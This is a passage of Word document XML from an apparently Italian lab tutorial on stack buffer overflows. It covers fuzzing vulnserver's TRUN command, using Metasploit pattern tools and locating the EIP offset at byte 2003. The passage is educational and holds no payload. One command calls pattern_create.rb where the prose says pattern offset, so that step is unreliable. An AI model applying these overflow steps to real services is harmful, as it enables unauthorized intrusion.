        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc76047768"/>
      <w:r w:rsidRPr="008C1448">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">4.3 </w:t>
      </w:r>
      <w:r w:rsidRPr="008C1448">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Fuzzing</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="7FCFD28F" w14:textId="498AF5C7" w:rsidR="0069256B" w:rsidRDefault="00052309" w:rsidP="0069256B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Il “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Fuzzing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>” è un metodo simile allo “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Spiking</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">”, con la differenza che però abbiamo trovato già la nostra falla, adesso dobbiamo individuarne altre nel comando di TRUN, quindi invieremo dati casuali allo scopo di trovare ciò che vogliamo. Prima di tutto, dopo aver eseguito lo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Spiking</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> abbiamo notato che il software è andato in crash, quindi ogni volta che accadrà da adesso in poi bisognerà riaprire </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Immunity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Debugger, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>vulnserver</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> e fare l’</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>attach</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> del PID.</w:t>
      </w:r>
      <w:r w:rsidR="00C83D4B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Inoltre, faremo uso di scripts in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C83D4B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>python</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C83D4B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> che ci aiuteranno a trovare queste vulnerabilità.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7303AE2E" w14:textId="428A6C6E" w:rsidR="008C7CBA" w:rsidRDefault="008C7CBA" w:rsidP="0069256B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Creare quindi un nuovo file con il comando </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004F7EF5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>gedit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004F7EF5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> script1.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">, inserire il codice sotto, e dare i permessi al file con il comando </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004F7EF5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004F7EF5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> +x script1.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">. Subito dopo, eseguirlo con </w:t>
      </w:r>
      <w:r w:rsidRPr="004F7EF5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>./script1.py</w:t>
      </w:r>
      <w:r w:rsidRPr="008C7CBA">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524F2C1C" w14:textId="425BFD85" w:rsidR="004F7EF5" w:rsidRDefault="008C7CBA" w:rsidP="0069256B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Aspettando qualche secondo, noteremo di nuovo il crash, però, questa volta, premendo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Ctrl+C</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> per interrompere lo script, noteremo che il codice ci ha restituito il numero di byte in cui è andato in crash.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C2FECD" w14:textId="5E19BEDE" w:rsidR="004F7EF5" w:rsidRDefault="004F7EF5" w:rsidP="004F7EF5">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68E210B6" wp14:editId="26D59C98">
            <wp:extent cx="2057400" cy="487680"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="13" name="Immagine 13" descr="Immagine che contiene testo, dispositivo, calib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 dispositivo, calibro&#10;&#10;Descrizione generat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2057400" cy="487680"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="770B76D4" w14:textId="1766BE69" w:rsidR="0083237E" w:rsidRPr="0083237E" w:rsidRDefault="0083237E" w:rsidP="004F7EF5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">File: </w:t>
      </w:r>
      <w:hyperlink r:id="rId26" w:history="1">
        <w:r w:rsidRPr="0083237E">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
          </w:rPr>
          <w:t>script1.py</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="15814495" w14:textId="501DAE88" w:rsidR="004F7EF5" w:rsidRPr="008C1448" w:rsidRDefault="004F7EF5" w:rsidP="003441B6">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc76047769"/>
      <w:r w:rsidRPr="008C1448">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4.4 </w:t>
      </w:r>
      <w:r w:rsidRPr="008C1448">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Offset</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="3CA03A66" w14:textId="65B785F2" w:rsidR="004F7EF5" w:rsidRDefault="004F7EF5" w:rsidP="004F7EF5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Il nostro scopo, adesso, è di trovare l’offset esatto in cui sovrascrivere il registro EIP, che è la nostra priorità. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> ci mette a disposizione uno strumento chiamato “Pattern Create”, il quale creerà una stringa di valori che non si ripetono che avrà lunghezza pari, o poco più, alla lunghezza in byte appena trovata.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9A786B" w14:textId="4E03BBB1" w:rsidR="004F7EF5" w:rsidRPr="00225C29" w:rsidRDefault="004F7EF5" w:rsidP="004F7EF5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00225C29">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Il </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00225C29">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>comando</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00225C29">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00225C29">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sarà</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00225C29">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00225C29">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00225C29">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00225C29">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/share/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00225C29">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00225C29">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-framework/tools/exploit/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00225C29">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pattern_create.rb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00225C29">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -l 3000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0044665F" w14:textId="6D05400A" w:rsidR="0083237E" w:rsidRDefault="0083237E" w:rsidP="004F7EF5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083237E">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>N.B. Usiamo una lunghezza poco superiore a quella trovata per essere sicuri di non sbagliare.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D76ADD9" w14:textId="48448B7E" w:rsidR="0083237E" w:rsidRDefault="0083237E" w:rsidP="004F7EF5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>Creiamo il file script2.py e inseriamo la stringa generata nel codice, come riportato sotto. Diamo i permessi ed eseguiamolo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A829AF" w14:textId="176C6818" w:rsidR="0083237E" w:rsidRPr="0083237E" w:rsidRDefault="0083237E" w:rsidP="004F7EF5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083237E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083237E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> +x script2.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E21AB7" w14:textId="3313CA07" w:rsidR="0083237E" w:rsidRDefault="0083237E" w:rsidP="004F7EF5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083237E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>./script2.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683185E7" w14:textId="53F8A585" w:rsidR="0053382D" w:rsidRDefault="0083237E" w:rsidP="004F7EF5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0053382D">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t xml:space="preserve">Noteremo subito il crash, ma stavolta </w:t>
      </w:r>
      <w:r w:rsidR="0053382D">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t xml:space="preserve">prenderemo in considerazione il valore del registro EIP, ovvero </w:t>
      </w:r>
      <w:r w:rsidR="0053382D" w:rsidRPr="0053382D">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>386F4337</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67139D41" w14:textId="2AD893E8" w:rsidR="001919B1" w:rsidRDefault="0053382D" w:rsidP="0053382D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="249547B4" wp14:editId="014EF948">
            <wp:extent cx="2651760" cy="1264920"/>
            <wp:effectExtent l="0" t="0" r="0" b="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2651760" cy="1264920"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AF026C" w14:textId="5333B2FB" w:rsidR="0053382D" w:rsidRDefault="0053382D" w:rsidP="0053382D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>Stavolta useremo il comando “Pattern offset” per trovare una corrispondenza tra la stringa generata prima e il valore di questo registro:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01663C3A" w14:textId="756493EB" w:rsidR="0053382D" w:rsidRPr="00225C29" w:rsidRDefault="0053382D" w:rsidP="0053382D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00225C29">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00225C29">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00225C29">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/share/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00225C29">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00225C29">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-framework/tools/exploit/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00225C29">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pattern_create.rb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00225C29">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -l 3000 -q 386F4337</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8B9B47" w14:textId="77777777" w:rsidR="0053382D" w:rsidRPr="00225C29" w:rsidRDefault="0053382D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00225C29">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB463C6" w14:textId="73217762" w:rsidR="0053382D" w:rsidRDefault="0053382D" w:rsidP="0053382D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Eseguito il comando, ciò che ci verrà restituito è il numero (in byte) dove inizia il registro EIP, che, nel nostro caso, è il byte 2003.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EDE555" w14:textId="0D5BAAFA" w:rsidR="0053382D" w:rsidRDefault="0053382D" w:rsidP="0053382D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4ED7B6C1" wp14:editId="1256B14F">
            <wp:extent cx="5478780" cy="548640"/>
            <wp:effectExtent l="0" t="0" r="7620" b="381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8">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5478780" cy="548640"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BAF7EA" w14:textId="231F1362" w:rsidR="0053382D" w:rsidRDefault="0053382D" w:rsidP="0053382D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
      </w:pPr>
      <w:r>
